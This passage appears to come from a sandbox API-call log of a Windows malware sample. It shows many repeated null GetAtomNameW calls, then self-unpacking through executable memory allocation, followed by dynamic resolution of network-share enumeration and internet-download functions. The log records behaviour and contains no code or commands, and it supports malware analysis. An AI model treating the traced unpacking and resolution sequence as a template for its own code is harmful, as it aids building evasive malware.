nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.796] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.797] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.798] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.799] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.800] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.801] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.802] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.803] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.804] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0069.805] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0070.386] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0070.396] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0070.399] LocalAlloc (uFlags=0x0, uBytes=0x90b98) returned 0x310020 [0070.413] VirtualProtect (in: lpAddress=0x310020, dwSize=0x90b98, flNewProtect=0x40, lpflOldProtect=0x18ee70 | out: lpflOldProtect=0x18ee70*=0x4) returned 1 [0070.606] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0070.607] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0070.607] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0070.607] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0070.607] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0070.607] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0070.607] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0070.607] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0070.607] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0070.610] Module32First (hSnapshot=0x58, lpme=0x18f420) returned 1 [0070.613] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1e70000 [0070.663] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0070.663] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0070.663] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0070.664] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0070.664] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0070.664] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0070.664] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0070.664] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0070.664] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0070.664] SetErrorMode (uMode=0x400) returned 0x0 [0070.664] SetErrorMode (uMode=0x0) returned 0x400 [0070.664] GetVersionExA (in: lpVersionInformation=0x18e350*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e350*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.664] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0070.690] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f3d8 | out: lpflOldProtect=0x18f3d8*=0x2) returned 1 [0071.083] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x768e0000 [0071.083] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeW") returned 0x76901635 [0071.083] GetProcAddress (hModule=0x768e0000, lpProcName="UuidCreate") returned 0x768ff48b [0071.083] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringW") returned 0x76921ee5 [0071.084] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeA") returned 0x76923fc5 [0071.084] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringA") returned 0x7695d918 [0071.084] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74550000 [0071.087] GetProcAddress (hModule=0x74550000, lpProcName="WNetOpenEnumW") returned 0x74552f06 [0071.087] GetProcAddress (hModule=0x74550000, lpProcName="WNetEnumResourceW") returned 0x74553058 [0071.087] GetProcAddress (hModule=0x74550000, lpProcName="WNetCloseEnum") returned 0x74552dd6 [0071.087] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75190000 [0071.107] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0071.107] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0071.107] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlW") returned 0x7520be5c [0071.107] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenW") returned 0x751b9197 [0071.108] GetProcAddress (hModule=0x75190000, lpProcName="HttpQueryInfoW") returned 0x751b5c75 [0071.108] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0071.108] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0071.108] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74510000 [0071.115] GetProcAddress (hModule=0x74510000, lpProcName="timeGetTime") returned 0x745126e0 [0071.115] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0071.115] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendA") returned 0x753bd65e [0071.116] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindFileNameW") returned 0x753cbb71 [0071.116] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0071.116] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0071.116] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsW") returned 0x753c45bf [0071.117] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0071.117] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindExtensionW") returned 0x753ca1b9 [0071.117] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0071.117] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0071.117] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0071.118] GetProcAddress (hModule=0x76e10000, lpProcName="GetDriveTypeA") returned 0x76e3ef75 [0071.118] GetProcAddress (hModule=0x76e10000, lpProcName="OpenProcess") returned 0x76e21986 [0071.118] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0071.118] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemDirectoryW") returned 0x76e25063 [0071.118] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0071.119] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryW") returned 0x76e2492b [0071.119] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0071.119] GetProcAddress 